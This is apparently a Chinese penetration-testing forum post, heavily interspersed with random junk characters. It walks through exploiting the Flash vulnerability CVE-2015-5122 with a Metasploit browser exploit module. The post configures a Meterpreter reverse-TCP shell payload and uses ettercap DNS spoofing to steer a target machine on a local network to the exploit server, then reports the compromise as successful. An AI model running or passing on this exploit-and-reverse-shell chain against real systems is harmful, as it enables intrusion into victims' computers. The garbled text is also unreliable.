. v$ W0 _# `7 e( O 二、cve2015-5122漏洞实例演示虚拟机 8 Z" I- N9 l, g& d; y1 H t
; ]* w, c: o" x4 _5 z+ n关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: + Q4 A$ U. q7 a7 O) r5 j1 E% V1 J, B7 l
5 n; N1 N- R& i6 p- H3 csearch cve-2015-5122如图:
) Z) ^0 h+ X; e" j7 F4 b3 k
: | q; t- C7 p( J( ?
下面我们敲如下命令: , }# L9 t4 M* `* R ^0 d2 P9 {
$ D/ f0 F' F. Q5 n* \8 X1 quse exploit/multi/browser/adobe_flash_opaque_background_uaf 4 ?- |# L! K0 G& v. j
set PAYLOAD windows/meterpreter/reverse_tcp ; R+ E8 d! a$ a# x! h+ _* [0 i/ S
( T8 V! e3 {9 t: b& x6 W9 `- ]8 W( A* r3 b& t set LHOST 192.168.0.109
set URIPATH / /*根目录*/
]6 O# g# x1 I7 aset SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 9 D k8 X: o' C, @& K& N
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 5 u7 M1 B# L5 }4 p% ^& B% D
然后show options如图: 7 ?" `- x! s6 \1 w
8 f7 h4 U" i+ [" [1 I
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
0 y9 _3 ^, X" P
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
y; e) x C& \. B) ]5 ? Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf . t; I# t& `4 O+ r1 P
6 I O8 Q% v: ]# D) U
! }! P: j4 u. a' K$ S3 n 成功了,这时候我们断开ettercap,如图: : i+ \& b f) f. Z# f: F+ _6 H
# w( T* }/ U, ~4 }7 L: z" u0 T8 k7 e
$ @; x M8 q" R3 \: @; j$ u3 h
. ~# F) j% w7 W! C# x9 I Screenshot如图: 4 J$ D7 d8 n. d3 Q2 F9 j+ c
; ]5 i% P; `% _
$ O( S2 H9 W5 Q/ u) r
1 P( {% a5 ?1 v
/ u# c8 z% ^: q0 ?" v
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |